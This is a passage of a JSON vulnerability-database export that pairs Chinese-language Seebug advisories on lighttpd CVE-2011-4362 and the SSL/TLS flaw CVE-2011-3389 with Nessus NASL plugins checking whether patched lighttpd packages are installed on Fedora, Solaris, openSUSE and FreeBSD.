<=1.4.29\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nLightTPD\r\n--------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.lighttpd.net/", "cvss3": {}, "published": "2011-12-01T00:00:00", "title": "lighttpd mod_auth\u6a21\u5757base64 \u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-4362"], "modified": "2011-12-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-24275", "id": "SSV:24275", "sourceData": "\n ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n ...\r\n int ch, ...;\r\n size_t i;\r\n ...\r\n \r\n ch = in[i];\r\n ...\r\n ch = base64_reverse_table[ch];\r\n ...\r\n}\r\n---\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-24275", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T17:59:04", "description": "CVE ID: CVE-2011-3389\r\n\r\nMicrosoft Windows\u662f\u5fae\u8f6f\u53d1\u5e03\u7684\u975e\u5e38\u6d41\u884c\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\nMicrosoft Windows\u5728SSL/TLS\u534f\u8bae\u7684\u5b9e\u73b0\u4e0a\u5b58\u5728\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u6cc4\u9732\u654f\u611f\u4fe1\u606f\u5e76\u52ab\u6301\u7528\u6237\u4f1a\u8bdd\u3002\r\n\r\n\u6b64\u6f0f\u6d1e\u6e90\u4e8e\u5728CBC\u6a21\u5f0f\u4e2d\u7ed3\u5408\u5bf9\u79f0\u5bc6\u7801\u5957\u4ef6\u4f7f\u7528Secure Sockets Layer 3.0 (SSL)\u548cTransport Layer Security 1.0 (TLS) \u534f\u8bae\u65f6\u51fa\u73b0\u7684\u8bbe\u8ba1\u9519\u8bef\uff0c\u901a\u8fc7\u4e2d\u95f4\u4eba\u653b\u51fb\u52a0\u5bc6HTTPS\u4f1a\u8bdd\u3002\n\nMicrosoft Windows\r\nMicrosoft Windows XP Home\r\nMicrosoft Windows XP Professional\r\nMicrosoft Windows Server 2003\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff082588513\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\n2588513\uff1aMicrosoft releases Security Advisory 2588513\r\n\r\n\u94fe\u63a5\uff1ahttp://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", "cvss3": {}, "published": "2011-09-29T00:00:00", "title": "Microsoft Windows SSL/TLS\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2011-09-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20957", "id": "SSV:20957", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:49:53", "description": "BUGTRAQ ID: 54679\r\nCVE ID: CVE-2012-3698,CVE-2011-3389\r\n\r\nXcode\u662f\u82f9\u679c\u673a\u5668\u4e0a\u6240\u4f7f\u7528\u7684\u5f00\u53d1\u5de5\u5177\u3002\r\n\r\nApple Xcode 4.4\u4e4b\u524d\u7248\u672c\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\u53ef\u88ab\u6076\u610f\u7528\u6237\u5229\u7528\u6cc4\u9732\u654f\u611f\u4fe1\u606f\uff0c\u52ab\u6301\u7528\u6237\u4f1a\u8bdd\uff0c\u7ed5\u8fc7\u67d0\u4e9b\u5b89\u5168\u9650\u5236\u3002\r\n\r\n1\uff09 SSL 3.0\u548cTLS 1.0\u534f\u8bae\u7684\u5b9e\u73b0\u4e2d\u5b58\u5728\u8bbe\u8ba1\u9519\u8bef\u3002\r\n2\uff09 DR\u5b9e\u73b0\u4e2d\u7684\u9519\u8bef\u53ef\u5141\u8bb8App Store\u5e94\u7528\u8bbf\u95ee\u7528Xcode\u6784\u5efa\u7684Helper\u5de5\u5177\u4e2d\u7684\u5bc6\u94a5\u94fe\u9879\u76ee\u3002\n0\nApple XCode 4.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nApple\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://support.apple.com/", "cvss3": {}, "published": "2012-07-27T00:00:00", "type": "seebug", "title": "Apple XCode 4.x \u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2012-3698"], "modified": "2012-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60296", "id": "SSV:60296", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2023-05-18T14:23:45", "description": "This update fixes CVE-2011-4362 by updating to the latest release. It also fixes problems that had been reported with previous releases, such as ssl-related crashes on startup. This update fixes some minor SSL related problems, as well as a connection stall bug. This update fixes some minor SSL related problems, as well as a connection stall bug. This update fixes some minor SSL related problems, as well as a connection stall bug.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2012-06-26T00:00:00", "type": "nessus", "title": "Fedora 16 : lighttpd-1.4.31-1.fc16 (2012-9078)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4362"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:lighttpd", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-9078.NASL", "href": "https://www.tenable.com/plugins/nessus/59690", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-9078.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59690);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4362\");\n script_bugtraq_id(50851);\n script_xref(name:\"FEDORA\", value:\"2012-9078\");\n\n script_name(english:\"Fedora 16 : lighttpd-1.4.31-1.fc16 (2012-9078)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes CVE-2011-4362 by updating to the latest release. It\nalso fixes problems that had been reported with previous releases,\nsuch as ssl-related crashes on startup. This update fixes some minor\nSSL related problems, as well as a connection stall bug. This update\nfixes some minor SSL related problems, as well as a connection stall\nbug. This update fixes some minor SSL related problems, as well as a\nconnection stall bug.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=758624\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/082686.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7b2b223c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lighttpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"lighttpd-1.4.31-1.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:09:18", "description": "The remote Solaris system is missing necessary patches to address security updates :\n\n - Integer signedness error in the base64_decode function in the HTTP authentication functionality (http_auth.c) in lighttpd 1.4 before 1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to cause a denial of service (segmentation fault) via crafted base64 input that triggers an out-of-bounds read with a negative index. (CVE-2011-4362)", "cvss3": {}, "published": "2015-01-19T00:00:00", "type": "nessus", "title": "Oracle Solaris Third-Party Patch Update : lighttpd (cve_2011_4362_denial_of)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4362"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.0", "p-cpe:/a:oracle:solaris:lighttpd"], "id": "SOLARIS11_LIGHTTPD_20120417.NASL", "href": "https://www.tenable.com/plugins/nessus/80697", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80697);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-4362\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : lighttpd (cve_2011_4362_denial_of)\");\n script_summary(english:\"Check for the 'entire' version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - Integer signedness error in the base64_decode function\n in the HTTP authentication functionality (http_auth.c)\n in lighttpd 1.4 before 1.4.30 and 1.5 before SVN\n revision 2806 allows remote attackers to cause a denial\n of service (segmentation fault) via crafted base64 input\n that triggers an out-of-bounds read with a negative\n index. (CVE-2011-4362)\"\n );\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a913f44\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://blogs.oracle.com/sunsecurity/cve-2011-4362-denial-of-service-dos-vulnerability-in-lighttpd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Solaris 11/11 SRU 6.6.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:lighttpd\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^lighttpd$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.0.6.0.6.0\", sru:\"SRU 6.6\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : lighttpd\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_warning(port:0, extra:error_extra);\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"lighttpd\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:22", "description": "This update of lighttpd fixes an out-of-bounds read due to a signedness error which could cause a Denial of Service (CVE-2011-4362). Additionally an option was added to honor the server cipher order (resolves lighttpd#2364).", "cvss3": {}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : lighttpd (openSUSE-SU-2012:0240-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4362"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl", "p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_webdav", "p-cpe:/a:novell:opensuse:lighttpd-mod_webdav-debuginfo", "cpe:/o:novell:opensuse:11.4", "p-cpe:/a:novell:opensuse:lighttpd", "p-cpe:/a:novell:opensuse:lighttpd-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-debugsource", "p-cpe:/a:novell:opensuse:lighttpd-mod_cml", "p-cpe:/a:novell:opensuse:lighttpd-mod_cml-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_magnet", "p-cpe:/a:novell:opensuse:lighttpd-mod_magnet-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost", "p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool", "p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool-debuginfo"], "id": "SUSE_11_4_LIGHTTPD-120130.NASL", "href": "https://www.tenable.com/plugins/nessus/75941", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update lighttpd-5735.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75941);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-4362\");\n\n script_name(english:\"openSUSE Security Update : lighttpd (openSUSE-SU-2012:0240-1)\");\n script_summary(english:\"Check for the lighttpd-5735 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of lighttpd fixes an out-of-bounds read due to a\nsignedness error which could cause a Denial of Service\n(CVE-2011-4362). Additionally an option was added to honor the server\ncipher order (resolves lighttpd#2364).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=733607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-02/msg00030.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lighttpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_cml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_cml-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_magnet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_magnet-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_webdav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_webdav-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-debuginfo-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-debugsource-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_cml-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_cml-debuginfo-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_magnet-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_magnet-debuginfo-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_mysql_vhost-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_mysql_vhost-debuginfo-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_rrdtool-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_rrdtool-debuginfo-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_trigger_b4_dl-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_trigger_b4_dl-debuginfo-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_webdav-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_webdav-debuginfo-1.4.26-6.7.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd / lighttpd-mod_cml / lighttpd-mod_magnet / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:46", "description": "US-CERT/NIST reports :\n\nInteger signedness error in the base64_decode function in the HTTP authentication functionality (http_auth.c) in lighttpd 1.4 before 1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to cause a denial of service (segmentation fault) via crafted base64 input that triggers an out-of-bounds read with a negative index.", "cvss3": {}, "published": "2011-12-29T00:00:00", "type": "nessus", "title": "FreeBSD : lighttpd -- remote DoS in HTTP authentication (c6521b04-314b-11e1-9cf4-5404a67eef98)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4362"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:lighttpd", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_C6521B04314B11E19CF45404A67EEF98.NASL", "href": "https://www.tenable.com/plugins/nessus/57411", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57411);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-4362\");\n\n script_name(english:\"FreeBSD : lighttpd -- remote DoS in HTTP authentication (c6521b04-314b-11e1-9cf4-5404a67eef98)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"US-CERT/NIST reports :\n\nInteger signedness error in the base64_decode function in the HTTP\nauthentication functionality (http_auth.c) in lighttpd 1.4 before\n1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to\ncause a denial of service (segmentation fault) via crafted base64\ninput that triggers an out-of-bounds read with a negative index.\"\n );\n # https://vuxml.freebsd.org/freebsd/c6521b04-314b-11e1-9cf4-5404a67eef98.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?336cdb6a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n 